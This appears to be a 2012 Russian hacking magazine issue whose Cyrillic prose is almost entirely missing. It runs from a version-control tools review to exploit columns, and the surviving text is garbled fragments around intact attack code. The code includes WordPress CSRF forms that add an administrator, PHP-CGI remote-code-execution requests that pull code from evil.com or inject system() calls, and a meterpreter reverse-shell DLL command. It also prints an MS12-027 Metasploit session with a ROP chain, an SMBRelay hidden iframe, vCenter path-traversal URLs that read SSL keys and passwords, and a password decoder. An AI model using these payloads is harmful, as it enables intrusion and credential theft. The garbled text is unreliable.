200 .
, . .
,
. ,
,

. , ,
-



,
.

. ,

. ,
. ,
,
megaupload.com
.

, .

.
:
filehosting.com,
nekaka.com
( API
).
, ,
, (
-).

, .
,
,
.

, , -10 Google
.
, .

.
400 ,
. ,
, , :).
,


.

,

,
.
300500 .
, ,
.


.
, , .
, ,
, , ,
, , .

-.
.
,
. ,
90% ,
600
. 98%
120 .
,
, ,
. ,
, .
,
! z

!
, , ,

nekaka.com/reg/x.
31.07.2012.

039

PC ZONE





.
,
.

Windows
:
CVS, SVN, Git, Mercurial.

, ,
, . ,
, ,
: project, project_old, project_olders...
project1, project1.1, project1.2. , ,
?
? , , -
. - , .
, . , ,
Word, ,
.
,
.

CVS
, ,

CVS.
C-
ACK (Amsterdam Compiler Kit)
cmt ( commit).
,
, ,
,
.

, CVS
2008 .
.
,
CVS. , ,
:

, ; -ASCII
;
;

.
,
CVS ,

.

040

TortoiseCVS

WinCVS

TORTOISECVS.ORG

CVSGUI.SOURCEFORGE.NET


CVS TortoiseCVS,
Windows,
CVS .
,
CVS CVS ( , ,
). , . TortoiseCVS
CVS
, GUI, cvs.exe
.

TortoiseCVS,
, WinCVS
.
CVS,

.
,
. WinCVS ,
CVS-.
diff- (
).
.
, .


Subversion (SVN)
Subversion , 2004 CollabNet
Inc. ,

CVS. SVN
CVS
. ,


. , SVN: Apache, GCC,
Free Pascal, Python, Ruby, FreeBSD, Haiku,
AROS MediaWiki. ,
,
Subversion
:

Subversion

,
;
.
1.5 ,
;

,
Subversion,
: ,

,
;
.svn
.
1.7
.svn, SQLite.

TortoiseSVN
TORTOISESVN.NET

,
Subversion- Windows. TortoiseCVS,
Windows. -
IDE, .
:
Subversion-;
IDE;
;
;
;
.

VisualSVN
WWW.VISUALSVN.COM

Subversion-
Visual Studio,
IDE.
Visual Studio 2005, 2008, 2010. TortoiseSVN:
, , Subversion, ,
. VisualSVN
, , ,
.

.
, .


DVD

041

PC ZONE

Git

,

Linux.
,
.
Git
. Git
,
. Darcs, BitKeeper, Mercurial,
Bazaar Monotone, Git
,
. Git
.
.
Git Git .

GIT ,
: LINUX, DRUPAL, CAIRO, GNU CORE
UTILITIES, MESA, WINE, CHROMIUM, COMPIZ
FUSION, FLIGHTGEAR, JQUERY, PHP


, Git
. :
;

VCS, CVS, SVN Mercurial;
, Git ;
- ;
Git
, rsync.

SmartGit

TortoiseGit

WWW.SYNTEVO.COM/SMARTGIT/INDEX.HTML

CODE.GOOGLE.COM/P/TORTOISEGIT

Git, Java.
Git, ,
GitHub. GitHub,
: Assembla, Beanstalk,
Codebase, Unfuddle.
:
, , .
diff-, ,
. -
Java,
. ,
, , , SmartGit .

Git Microsoft
Windows. ,
SVN TortoiseSVN
( Tortiose-
VCS), .
,
, .

MSysGit Git Windows,
TortoiseGit MSysGit
.

Git, TortoiseGit , .


:


Unicode Microsoft Windows;
SHA1,
;
/ , ;


.
,
Git
, :
Linux, Drupal, Cairo, GNU Core Utilities,
Mesa, Wine, Chromium, Compiz Fusion,
FlightGear, jQuery, PHP.

042

CVS2SVN
CVS SVN,
cvs2svn (cvs2svn.tigris.org). CVS
Subversion ( Git) ,
svnadmin. cvs2svn
, CVS: , ,
, , . ,
, , .


Mercurial (Hg)
Mercurial, Hg,
,

.
Python,

(, diff)
C.
Mercurial
Linux,
Windows, Mac OS
X UNIX-.

, Mercurial

(
),
(


),
( ).

TortoiseHg
(TORTOISEHG.BITBUCKET.ORG)

VisualHG
SHARESOURCE.ORG/
PROJECT/VISUALHG/

, ,

. VisualHG Visual Studio
(MSVS 2005, MSVS 2008 MSVS
2010), Mercurial-
IDE.
,
,

.
. VisualHG
.
VisualSVN,
,
, ,
Mercurial.



Mercurial. Windows .
.
TortoiseSVN TortoiseGit,


. TortoiseHg
Mercurial, . ,
, .
Tortoise-, , ,
.





.

.
,

.
.
,

,

. z

043

/ EASY HACK

GreenDog , Digital Security (twitter.com/antyurin)

EASY
HACK
,
CURSORJACKING

, ui-redressing
clickjacking. , ,
HTML, CSS JavaScript, . - , - . ,
- ,
Facebook-
. .
. , frame-busting
(X-Frame-Options),
( ),
.
ui-redressing. , ,
. ,
. , .
.

.
(, , ) ,
. ,
, -,
,
(, Like).
, , ,
, ,
.
:
JavaScript .

044

, .
<style type="text/css">
#cursorjacking {
cursor:url("pointer2visible.png"),default;
}
#cursorjacking a {
cursor:url("pointer2visible.png"),default;
}
</style>
<div id="cursorjacking">
<a href="#" onClick="alert('Three');">Three</a>&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="#"
onClick="alert('Four');">Four</a>
</div>

cursorjacking
(Marcus Niemietz). CSS, . . .
, . (
, ) . ,
, .
, .
,
.


:).
Four
Three.
(Kotowicz), JS.
. -,
(style="cursor:none"). -, ( ),

. :

TRUE
FAKE
.

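<!-- Hide the real cursor on the whole page -->
<body style="cursor:none;height: 1000px;">
<!-- Image of a cursor that is drawn in place of the real one -->
<img style="position: absolute;z-index:1000;"
id=cursor src="cursor.png" />
<!-- Button the fake cursor appears to point at -->
<button id=fake style="font-size: 150%;position:absolute;
top:100px;left:630px;">click me click me</button>
<!-- Link that actually receives the click -->
<div style="position:absolute;top:100px;left:30px;">
<a href="#" onclick="alert(/you clicked-me-instead/)">
i'm not important</a>
</div>
<script>
// Element holding the fake cursor image
var oNode = document.getElementById('cursor');
// Mouse-move handler
var onmove = function (e) {
// Real pointer coordinates
var nMoveX = e.clientX, nMoveY = e.clientY;
// Draw the fake cursor 600 px to the right of the real pointer
oNode.style.left = (nMoveX + 600)+"px";
oNode.style.top = nMoveY + "px";
};
// Track every mouse movement on the page
document.body.addEventListener('mousemove',
onmove, true);
</script>
</body>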

,

. ,
- 600
.
Twitter.
, . ,
FF Chrome. ,
( ),
. , ,
( ),
- .
: goo.gl/ME7fL, goo.gl/qAtQI.


.
, .
Wi-Fi- .
.
- :). Routerpwn
(routerpwn.com). .
,
MAC.
, - Routerpwn ,
-.


. -,
. :)
: ,
, IP , JavaScript URL.
,
.
Telnet D-Link DIR-300, :
login: Alphanetworks
password: wrgg19_c_dlwbr_dir300

045

/ EASY HACK

HTTPS-

. ,
- , . ,
-, .
,
, wireshark. ,
,
HTTP. .
SSL ,
.
, , !
SSL-
. ,

Burp ZAP. , .
, , ,
-, . ,
man-in-the-middle.
, , ,
, ,
. ,
Burp
.
1. Burp Internet Explorer.
2. https://google.com.
3. View.
4. Certificate Path
PortSwinger View.
5. Install .
, . -
, Dropbox .
? , -.
/ ,
.
, , easy ,
.

, Evernote

046

API
Monitor (www.rohitab.com). ,
API- ( - ),
. -
ProcMon ,
,
- .
. ,
, . .
. , Evernote. ,
,
HTTPS- IE Firefox. .
Evernote 32- API Monitor
( Evernote 32-). Evernote
. , API-
, ,
- ( IE FF ).
, , :).
API filter
, .
, .
Running Process evernote.exe,
Start Monitoring. , Evernote. API
Monitor . ,
, HEX buffer,
HTTP- Evernote.
, .
, Evernote :
, .
. ,
.



DLL-HIJACKING

-
,
Windows. ,
, , exe-
. -
,
.
. ,

,

DLL. DLL-hijacking , Windows
DLL .
:
1. , .
2. .
3. 16- .
4. Windows.
5. .
6. , .
,
DLL, .
,
.
PATH, , ,

. , PATH
, ,
, DLL.
, . -, PATH, . K,
. (-
) ,
(, - JAVA).
, .
. :
DLL-hijacking, PATH.
, ProcMon
. :

DLL-hijacking

1. contains- ProcMon:
Process name _;
Result Name not found;
Path PATH.
2. ( ):
wmic service _ call startservice

PATH DLL-hijacking. ,
. , .
, , , ,
. .
, DLL-hijacking
PATH .
.
, - .
, .
,
Metasploit meterpreter DLL-hijacking:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 D > dllname.dll

. !

,
(NTLM) :
- , ? , .
: - Ruby.
, .


, : -
, - , , , . ,
,
Burp ZAP owasp. .
Burp , .

047

(ivinside.blogspot.com)
(115612, . , . 1)

/
,
BSOD ,

.

CSRF WordPress

BRIEF
WordPress CMS,
. Cross Site Request Forgery (
),
Ivano Binetti.

,

. -
antiCSRF (_wpnonce, _wpnonce_create-user,
_ajax_nonce, _wpnonce-custom-background-upload, _wpnonce-custom-header-upload). ,
12 . ,

1, :

EXPLOIT

:
;
/;
/;
;
;
;
;
;
;
WordPress;
.

CVSSV2
6.0
(AV:N/AC:M/AU:S/C:P/I:P/A:P)

<html><body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change post title</H2>
<form method="POST" name="form0" action=
"http://<wordpress_ip>:80/wp-admin/admin-ajax.php">
<input type="hidden" name="post_title" value="hackedtitle"/>
<input type="hidden" name="post_name" value="hackedtitle"/>
<input type="hidden" name="mm" value="03"/>
<input type="hidden" name="jj" value="16"/>
<input type="hidden" name="aa" value="2012"/>
<input type="hidden" name="hh" value=""/>
<input type="hidden" name="mn" value=""/>
<input type="hidden" name="ss" value=""/>
<input type="hidden" name="post_author" value="1"/>
<input type="hidden" name="post_password" value=""/>
<input type="hidden" name="post_category%5B%5D" value="0"/>
<input type="hidden" name="post_category%5B%5D" value="1"/>
<input type="hidden" name="tax_input%5Bpost_tag%5D" value=""/>
<input type="hidden" name="comment_status" value="open"/>
<input type="hidden" name="ping_status" value="open"/>
<input type="hidden" name="_status" value="publish"/>
<input type="hidden" name="post_format" value="0"/>
<input type="hidden" name="_inline_edit"
value="<sniffed_value>"/>
<input type="hidden" name="post_view" value="list"/>
<input type="hidden" name="screen" value="edit-post"/>
<input type="hidden" name="action" value="inline-save"/>
<input type="hidden" name="post_type" value="post"/>
<input type="hidden" name="post_ID" value="1"/>
<input type="hidden" name="edit_date" value="true"/>
<input type="hidden" name="post_status" value="all"/>
</form></body></html>
<wordpress_ip> ,
.
admin2 password
:
<html><body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to add Administrator</H2>
<form method="POST" name="form0" action=
"http://<wordpress_ip>:80/wp-admin/user-new.php">
<input type="hidden" name="action" value="createuser"/>
<input type="hidden" name="_wpnonce_create-user"
value="<sniffed_value>"/>
<input type="hidden" name="_wp_http_referer" value=
"%2Fwordpress%2Fwp-admin%2Fuser-new.php"/>
<input type="hidden" name="user_login" value="admin2"/>
<input type="hidden" name="email" value="admin2@admin.com"/>
<input type="hidden" name="first_name"
value="admin2@admin.com"/>
<input type="hidden" name="last_name" value=""/>
<input type="hidden" name="url" value=""/>
<input type="hidden" name="pass1" value="password"/>
<input type="hidden" name="pass2" value="password"/>
<input type="hidden" name="role" value="administrator"/>
<input type="hidden" name="createuser" value="Add+New+User+"/>
</form></body></html>
TARGETS
WordPress 3.3.1 .
SOLUTION
WordPress .

7.5

(AV:N/AC:L/Au:N/C:P/I:P/A:P)
BRIEF
(regexp),
. ,
Ruby,
- .
EXPLOIT
, ^ (
) $ ( ) Ruby -





, . , URL, :
javascript:alert(1);exploit_code();/*
http://hi.com
*/
URL,
JavaScript-.
, Ruby,
. ,
,
^ $. , 90%
- Ruby,
, github.com, soundcloud.com, tumblr.com . , .
TARGETS
- Ruby.
SOLUTION
\A \z ,
.

MS12-027
ActiveX-
MSCOMCTL

CVSSV2

BASE SCORE:9.3

(HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
BRIEF
ActiveX- ListView, ListView2,
TreeView TreeView2 MSCOMCTL.OCX -,
Office RTF-. ITW
.
EXPLOIT
ActiveX-,
RTF-.
RTF
, :

Ruby

CVSSV2

\n!
, :

{\object\objocx\objsetsize\objw3240\objh570{\*\objclass
MyControl.MControl}...
MS Office 2007:
msf > use exploit/windows/fileformat/ms12_027_mscomctl_bof
msf exploit(ms12_027_mscomctl_bof) > set payload windows/exec
payload => windows/exec
msf exploit(ms12_027_mscomctl_bof) > set cmd calc.exe
cmd => calc.exe
msf exploit(ms12_027_mscomctl_bof) > exploit
[*] Creating msf.doc file ...
[+] msf.doc stored at /home/pikofarad/.msf4/local/msf.doc
msf exploit(ms12_027_mscomctl_bof) >
MS Office 2010 metasploit msgr3en.dll,
ROP-. ROP- -, :).
wwlib.dll, MS Office. WinXP SP3, 2600. Word 2010,
Immunity Debugger.
mona.py,
corelanc0d3r ( Peter Van Eeckhoutte
). ImmDbg:
!mona rop -m wwlib
. . ROP- .
,
.
Log rop_chains.txt:
...
ROP Chain for VirtualAlloc() [(XP/2003 Server and up)] :
-------------------------------------------------------
def create_rop_chain()
rop_gadgets =
[
0x3231e980, # POP ECX # RETN [wwlib.dll]
0x316d14ac, # ptr to &VirtualAlloc() [IAT wwlib.dll]
0x31735c11, # MOV ESI,DWORD PTR DS:[ECX]
# RETN [wwlib.dll]
0x31ae7361, # POP EBP # RETN [wwlib.dll]
0x31837b34, # & jmp esp [wwlib.dll]
0x3235b6b8, # POP EBX # RETN [wwlib.dll]
0x00000001, # 0x00000001-> ebx
0x31ac2bca, # POP EDX # RETN [wwlib.dll]
0x00001000, # 0x00001000-> edx
0x325950f3, # POP ECX # RETN [wwlib.dll]
0x00000040, # 0x00000040-> ecx
0x31f3ca18, # POP EDI # RETN [wwlib.dll]
0x32596c01, # RETN (ROP NOP) [wwlib.dll]
0x31e5d5a6, # POP EAX # RETN [wwlib.dll]
0x90909090, # nop
0x31f2f672, # PUSHAD # RETN [wwlib.dll]
# rop chain generated with mona.py
# note: this chain may not work out of the box
# you may have to change order or fix some gadgets,
# but it should give you a head start
].flatten.pack("V*")
return rop_gadgets
end
...

create_rop_chain
,
ROP-:
...
# winword.exe v14.0.6024.1000 (SP1)
[ 'Microsoft Office 2010 SP1 English on Windows [XP SP3 /
7 SP1] English',
{
'Ret' => 0x32596c01,
# retn # wwlib.dll <--
'Rop' => true,
'RopOffset' => 120
}
],
...
- .
target == 1, MS
Office 2010:
msf > use exploit/windows/fileformat/ms12_027_mscomctl_bof_wwlib_rop
msf > set target 1
target => 1
msf exploit(ms12_027_mscomctl_bof_wwlib_rop) > set payload windows/exec
payload => windows/exec
msf exploit(ms12_027_mscomctl_bof_wwlib_rop) > set cmd calc.exe
cmd => calc.exe
msf exploit(ms12_027_mscomctl_bof_wwlib_rop) > exploit
[*] Creating msf.doc file ...
[+] msf.doc stored at /home/pikofarad/.msf4/local/msf.doc
msf exploit(ms12_027_mscomctl_bof_wwlib_rop) >
msf.doc ...
TARGETS
Microsoft Office 2003 SP3, 2007 SP2/SP3, 2010 Gold/SP1; Office 2003
Web Components SP3; SQL Server 2000 SP4, 2005 SP4 2008 SP2/SP3/R2;
BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, 2009
Gold/R2; Visual FoxPro 8.0 SP1 9.0 SP2; Visual Basic 6.0.
SOLUTION
, .

Microsoft Incremental Linker Integer Overflow

CVSSV2

BASE SCORE: 7.2

metasploit.
ms12_027_mscomctl_bof.rb
ms12_027_mscomctl_bof_wwlib_rop.rb.

(AV:L/AC:L/Au:N/C:C/I:C/A:C)
BRIEF
Walied Assar Microsoft Visual Studio 2008,
-

XSS Github, Ruby

Ruby


ROP-, MS Office 2010

.

(link.exe) ,
COFF. ,
. ,

PE- dumpbin.exe
link.exe /dump.
EXPLOIT
- ,
COFF, , . ReadStringsAndSymbols
COFF
, PointerToSymbolTable NumberOfSymbols
IMAGE_FILE_HEADER .
typedef struct _IMAGE_FILE_HEADER {
WORD Machine;
WORD NumberOfSections;
DWORD TimeDateStamp;
DWORD PointerToSymbolTable;
DWORD NumberOfSymbols;
WORD SizeOfOptionalHeader;
WORD Characteristics;
} IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER;
ReadStringsAndSymbols:
int type;
wchar_t* actionName;
int magic2;
void ReadStringsAndSymbols(DUMPSTATE* pDump, int xx,
                           wchar_t* fileName) {
    if (pDump->PointerToSymbolTable && pDump->NumberOfSymbols) {
        actionName = L"ReadStringsAndSymbols.LoadStrings";
        int SymEntrySize = (type==2) ? 0x14 : 0x12;
        LoadStrings(pDump, fileName, SymEntrySize);
        // ...
        actionName = L"ReadStringsAndSymbols.ReadSymbolTable";
        ReadSymbolTableEx(pDump, ...);
    }
    pDump->StringsNSymbols = 0;
    return;
}


, MS Office 2007

, ReadStringsAndSymbols
LoadStrings ReadSymbolTableEx.
LoadStrings , .
,
PbMappedRegion , ,
. ReadSymbolTableEx
ReadSymbolTableT ,
.
ReadSymbolTableT ReadSymbolTableEx
:
void ReadSymbolTableEx(int A, int NumberOfSymbols) {
// ...
ReadSymbolTableT(...);
unsigned long size = (NumberOfSymbols*4) + NumberOfSymbols;
size += size;
size += size;
void *p = AllocBlk(size);
// ...
ConvertRgImgSymToRgImgSymEx(NumberOfSymbols, p);
}
AllocBlk, , ,
RtlAllocateHeap. :
0x400
, 0x400 . , NumberOfSymbols
0x8000000C,
0xf0 , , 0x400 .
,
ConvertRgImgSymToRgImgSymEx. ,
. ConvertRgImgSymToRgImgSymEx
, . , , ... , ,
.
TARGETS
Microsoft Visual Studio 2008, 9.00.21022.08, ,
.
SOLUTION
. : ! :) z


Ares (sniff.su)

SMBRELAY
WINDOWS 7
SMBRelay
MITM-,

.
, ,
, ?
,
,
.

SMBRelay

SMB?

SMBRELAY

, SMB (Server Message


Block). : ,
SMB.

, ,
.
1983
,
, SMBRelay.

,
SMB, ,
SMBRelay
.
, SMB
:

(share-level authentication). , ,

. -


,
.


- NTLM (
LM).
challenge,

.
,
Integrated Windows Authentication (IWA).


SMBRelay

NTLM- XP

MITM- Intercepter-NG

GUI Intercepter-NG

, -
Windows ,
, ,
,
. SMB-
,
,

. .

. challenge.
5.
challenge,
.
6. response
,
.
7. , ,
.


.

.

2008
,
.
Microsoft
,
.
( ) .

, !
2008 smbrelay3 Tarasco
Security,

.
SMB SMB, , HTTP/IMAP/
POP3/SMTP. NTLM.
:
smbrelay3 ,
cmd.exe,
/,
. Windows XP SP3
cmd.exe
( MS08-068
). XP
Windows 2003 ( ). Windows
XP ,

-,
, 445-
TCP- ( NetBios
139).

,
IP- .
(
, ). , :
1.
SMB-.
2. , .
3. , .
4. ,


,
SMBRelay, 2001 .
Sir Dystic
Cult Of The Dead Cow.

IP-.
smbrelay2,
NetBios-.
,
NTLM challenge+response
(, Cain & Abel).

MITM?

, Intercepter
!
(Windows, Linux, BSD),
Android iOS.
Windows-,
: ,
, ARP Poison.
Intercepter Console Edition :
GUI- Ncurses.
.

MITM- ( SMBRelay)
Intercepter-NG .
.
,
IP-. IP-
, .
Stealth IP-,
. IP-
IP , (
).




SMBRelay ,
Windows 7.

SMBRELAY VS WINDOWS 7

, Windows 7 LAN Manager
authentication level
Send NTLMv2 response only.
NTLM
response
NTLMv2 (

). ,
SMBRelay ( smbrelay3
Metasploit)
NTLMv2-.
, ,
. smbrelay3 NTLMv2
Windows 7 Windows XP.
. Windows 7,
IE,
Intranet. :

some_host IP- , , , Intranet
,
. IE

Automatically detect intranet network:

,

. , , Windows
7
.
,
Intranet Win7
SMBRelay, .

,
,
, , ,

. , .
SMBRelay SMB
Signing,
.

,
, , .
SMB Signing ,

.

IPC$ ADMIN$:
,

(C$...) . SMBRelay.

SMBRELAY
SMBRelay
Intercepter-NG,
NTLMv2
( smbrelay4).
, 445-
,
HTTP SMB.

NTLM-,

, - .

:
,

, ettercap -.
,
.
? ,
Arp Poison -
,
SMBRelay-.
,
. HTML, :
<!DOCTYPE...>
<meta name="keywords"...>
<meta name="description"...>.


:
<iframe src=http://ip__:
____smbrelay
width="0" height="0"></iframe>

, , NTLM
IE/Chrome, Firefox (,
, Opera)
.


.
,
,
. SMBRelay

SMB Signing EnableSecuritySignature,
RequireSecuritySignature. . z
WWW

LLMNR-

Windows . Vista
, LLMNR (Link Local Multicast Name Resolution).
DNS .
,
. , DNS NBNS (NetBIOS Name Service).
some_name,
LLMNR. ,
DNS. ,
NBNS. LLMNR, , ,
, , NBNS.
LLMNR- ,
(Vista/7/W2k8) (2k/XP/2k3),
, LLMNR. ,
.
, LLMNR , Network
Discovery .

Intercepter-NG

, Resurrection
Mode, .

.

,
,
HTTP/FTP/SMB/IMAP/
POP3/SMTP,
.
,


.


bit.ly/36cpY4
;
bit.ly/LwV62S

Intercepter.

WARNING

.



,


.


, Digital Security (twitter.com/asintsov)

VMware vCenter

, .
VMware vCenter.
,
.

VMWARE VCENTER

../../FILE.EXT

.
. !
VMware. ,
, ,
, .
VMware , .
, , VMware vCenter.
, , 10 VMware ESX(i).
50 . ,
vCenter. , vCenter
,
ESX . ,
. .
: vCenter .



, , .
, . : vCenter.
VMware. ,
- ( TCP- 9084) - Jetty
. :
http://target:9084/vci/download/health.xml/%3f/../../../../


: ,
. : ?
,
, (. ).
? , vSphere-
vCenter SOAP,
HTTPS-, XML- , .
SOAP-, cookie c PHPSESSIONID, :). , , , SOAP- vCenter
, -
( ).
Jetty-- SOAP-.
http://target:9084/vci/download/health.xml/%3f/../../../../
../../ProgramData\VMware\VMware VirtualCenter\Logs\vpxdprofiler-6.log

vSphere.
-,
vSphere,
add-on Metasploit VASTO. 2010
Black Hat 2010.
,
( ,
,
vCenter, ).
Google


VMware vCenter

vCenter. ,
, ( - 2011)
, ,
Jetty -.
-!


?
( ), ,
. ,
, . ,
, ,
. - Jetty,
.
15 .
:
http://target:9084/vci/download/.\..\..\..\..\..\..\..\..\
FILE.EXT

, MITM-
ARP-SPOOFING,
. , IP- - . , SSL- (cain
),
, SSL-.
, .
.

VMWARE VCENTER ORCHESTRATOR


-, SOAP-!

.
VMware,
. , ,
, ,
SSL. SSL- (Wireshark
). :
http://target:9084/vci/downloads/.\..\..\..\..\..\..\..\
Documents and Settings\All Users\Application Data\VMware\
VMware VirtualCenter\SSL\rui.key

0(LD)-DAY VULNERABILITIES
,
vCenter,
20092010 :
bit.ly/K5HiP1 - ESX,
;
bit.ly/sVyRcA Jetty,
VMware vCenter;
bit.ly/KYwhAB
, ;
bit.ly/K98Vqy Virtual Appliance Management

.
,
VASTO.


Black Hat ;-)

vCenter ,
,
. ,
.
. .
, :
http://target:9084/vci/download/.\..\..\..\..\..\..\..\..\
Program files\VMware\Infrastructure\Orchestrator\
configuration\jetty\etc\passwd.properties

MD5-. ,
. ? MD5 . .
, . , , ,
. , ,
vCenter-,
,
.
HTML- , , , ,
, , .
, , ,
. :).
, ,
, , , , .

MOARRRRRR!
, , . ,
, .
, . , :


VASTO VS VCENTER
VASTO Metasploit VMware.
:
vmware_login . , root,
wmware ( , ).
vmware_session_rider - vSphere,
SESSION_ID .
vmware_version VMware .
vmware_vilurker , MITM
, .
.

http://target:9084/vci/download/.\..\..\..\..\..\..\..\..\
Program Files\VMware\Infrastructure\Orchestrator\
app-server\server\vmo\conf\plugins\VC.xml

000a506275767b74786b383a4a60be767
864740329d5fcf324ec7fc98b1e0aaeef

( ):
- - . ,
, . , .
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<virtual-infrastructure-hosts>
<virtual-infrastructure-host
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:type="VirtualCenterHost">
<enabled>true</enabled>
<url>https://new-virtual-center-host:443/sdk</url>
<administrator-username>vmware</administrator-username>
<administrator-password>000a506275767b74786b383a4a60be76786
4740329d5fcf324ec7fc98b1e0aaeef </administrator-password>
<pattern>%u</pattern>
</virtual-infrastructure-host>
</virtual-infrastructure-hosts>

C:\Program Files\VMware\Infrastructure\
Orchestrator\app-server\server\vmo\conf\vmo.properties.
.
, .
, CTF LeetMore .
:) ,
,
. Java- , ,
. : ,
, (
). , Password01. :

vCenter !


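# Encoded password as stored in VC.xml
pass = "000a506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef"
# The first three characters hold the password length
len = (pass[0..2]).to_i
# Split the remainder into two-character hex pairs
enc_pass = pass[3..-1].scan(/.{2}/)
dec_pass = (0...len).collect do |i|
  byte = enc_pass[i].to_i(16) # hex pair to integer
  byte -= i                   # subtract the character's position
  byte.chr
end
# Result: "Password01."
puts "Password: #{dec_pass.join()}"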

, 0-

. vCenter.
, Metasploit.

, 0- , . , , ,
.
.
.
, ! z

vCenter


Raz0r (raz0r.name)

PHP-CGI
,
,
PHP
-.
PHP
.

PHP-,
.

PHP
PHP , .
, , PHP,
, PHP CGI. ,
.


2012 Eindbazen
Nullcon CTF, capture-the-flag. PHP, , . ,
Nullcon ,
0-day- PHP. Eindbazen
PHP . , . PHP
.
,
.
reddit.com -
PHP, .
,
PHP-,
CGI. Eindbazen ,
, .
,
,
PHP-. Eindbazen
, ,
advisory, , .


,
PHP CGI. PHP - Apache.
mod_php,


PHP:

CGI-. Apache , RFC:


.
PHP-CGI? .
2004 , , PHP, CGI-
:
if (getenv("SERVER_SOFTWARE")
|| getenv("SERVER_NAME")
|| getenv("GATEWAY_INTERFACE")
|| getenv("REQUEST_METHOD")) {
cgi = 1;
}
if(!cgi) getopt(...)

Options +ExecCGI
AddHandler cgi-script .php
Action cgi-script /path/to/php-cgi

.
,
, , ,
. , , -
CGI-. , , ,

-: CGI PHP stdin-,

,
-.
getopt(), , .
argc argv ,
main() . argv,
- ( - --),
. - -
STDIN CGI,
- .
, , ,
. PHP-CGI
.

Apache ,
- ,
mod_action.
-.

SCRIPT_FILENAME, ,
. ,
stdin.
, , , , stdout.
, , stdin .
, .
CGI , stdin,
-. , ?
, -
stdin.
CGI RFC, ,
? URI-, =, -
, + ( ) stdin

, .htaccess

PHP Apache
. CGI (Common
Gateway Interface). CGI , -,
.
CGI - ,
.
c Apache
: mod_php FastCGI.
, Apache PHP CGI -:


,
.

, php-cgi ,
, :
s ;
n php.ini;
T <n> n ;
d foo[=bar]
php.ini.
-r
PHP- ,
CGI- .
, ,
. , ,
.

BLACKBOX? NOPE!
.
http://site.com/index.php?-s, PHP
, .
,
.
,
. , , ,
. , ,

.

RCE
, , -r
? , PHP, auto_
prepend_file auto_append_file, .
PHP-,
, On -

allow_url_include, ,
URL. ,
Suhosin patch, PHP,
'-n'. PHP php.ini, ,
.
:
http://site.com/index.php?-n+-dallow_url_include%3DOn+dauto_prepend_file%3Dhttp://evil.com/code.txt


php://input,
POST-.
auto_prepend_file php://input,
. POST-
:
POST /index.php?-n+-dallow_url_include%3DOn+dauto_prepend_file%3Dphp%3a%2f%2finput HTTP/1.1
Host: site.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
Connection: close
<?php system("uname -a"); ?>



, / /proc/
self/environ. , ,
ProcFS,
. ,
: CGI HTTP-
. ProcFS *nix-,
FreeBSD, /proc/
self/environ . -

PHP-CGI
234 076
PHP-CGI


Apache- mod_security,

DreamHost.

WWW

INFO

bit.ly/IwDW8y

Eindbazen;
bit.ly/JuwsOR

PHP-CGI,

;
bit.ly/goqH0F
CGI RFC;
bit.ly/KsYavW


2004 .

FastCGI,
CGI,

/
stdin stdout

-
UNIX
TCP/IP.
FastCGI

.


PHP:

/proc/self/environ
auto_prepend_file , User-Agent:
GET /index.php?-n+-dallow_url_include%3DOn+dauto_prepend_file%3D%2fproc%2fself%2fenviron HTTP/1.1
Host: site.com
User-Agent: <?php system("id"); ?>
Connection: close


PHP .
,
, , ,
. :
if(*decoded_query_string == '-' &&
strchr(decoded_query_string, '=') == NULL) {
skip_getopt = 1;
}

:
=, PHP CGI. ,
. ,
, = URL-
(%3d). , , %3d,
: /?-s+%3d.
decoded_query_string
query_string, ,
. ,
php-cgi.
, DreamHost,
Nullcon CTF, :
#!/bin/sh
exec /dh/cgi-system/php5.cgi $*

, php5.cgi $* ,
, . , sh-
php-cgi /?+-s.
PHP . .htaccess :
RewriteEngine on
RewriteCond %{QUERY_STRING} ^[^=]*$
RewriteCond %{QUERY_STRING} %2d|\- [NC]
RewriteRule .? - [F,L]

-5 PHP

: bit.ly/MBmqSZ
: PHP < 4.3.8, PHP < 5.0.1
: , 2004

,
_. ,
.

ZEND_HASH_DEL_KEY_OR_INDEX
: bit.ly/doi4UA
: PHP < 4.4.3, PHP < 5.1.3
: , 2006
ZHDKOI-
, Joomla, phpBB, Wordpress vBulletin.
-,
.
, unset().

GPC- unset(),
/ .

PHP-

: bit.ly/3zpJMN
: PHP < 5.3
: USH, 2009

LFI- RFI-.
null-. ,
magic_quotes_gpc null- ,
LFI-RFI-.
;
,
MAXPATHLEN.


: bit.ly/KOzjVr
: PHP < 5.2.14, PHP < 5.3.3
: , 2010
, -

. , unserialize()
, , ,
. , -
Zend Framework
_SESSION,
PHP- ZF.


: =, , -
403 (Forbidden).

, PHP ,
-. ,
, PHP-CGI .
, ,
. z


: bit.ly/LbpQqH
: PHP 5.3.9
: , 2012
5.3.9 PHP
max_input_vars,
PHP Hash Collision DoS,
GPC-.
,
. ,
max_input_vars ( 1000).


D1g1 , Digital Security (twitter.com/evdokimovds)

X-Tools

Landing Site

:
Wayne Huang
URL:
www.drivesploit.org
:
*nix/win

: Julien Tinnes
URL: metasm.cr0.org
: *nix/win

: Cong Zheng,
Ryan W Smith
URL: code.google.
com/p/apkinspector
: *nix

Exploit Server

Controller

Malware Server

DRIVE-BY DOWNLOAD

RUBY

ANDROID-

Drivesploit
Black Hat USA 2010,
DEF CON 18. metasploit-,
drive-by
download . ,
drive-by download ,
html iframe,
, ,

.

Aurora, 0-day IE
(CVE-2010-0249).
, ,
. , exploit-pack Metasploit .
Metasploit

.
Drivesploit:
Circumventing Automated and Manual Detection
of Browser Exploits (slidesha.re/a0zpH8).
,

.

METASM , , , !

(SSTIC, hack.lu, HITB, REcon).
Ruby.
:

APKinspector
apk-.
Android.
,

.

Android. APKinspector
:
(CFG);
Dalvik-;
-;
smali-;
Java-;
;
;
AndroidManifest.xml.


Intel IA32 (16/32/64 bits), MIPS PPC.


: ARM, Cell SPARC.

:
METASM , ,
. :
Raw ( -);
MZ, PE/COFF (32 64 bits);
ELF (32 64 bits);
Mach-O ( );
UniversalBinary;
(a.out, xcoff, nds).
:
,
backtracking , linux/windows/remote
API-, / C,
GDB- .

:

;
;
;
;
/
;

.


X-Tools

:
cr4sh

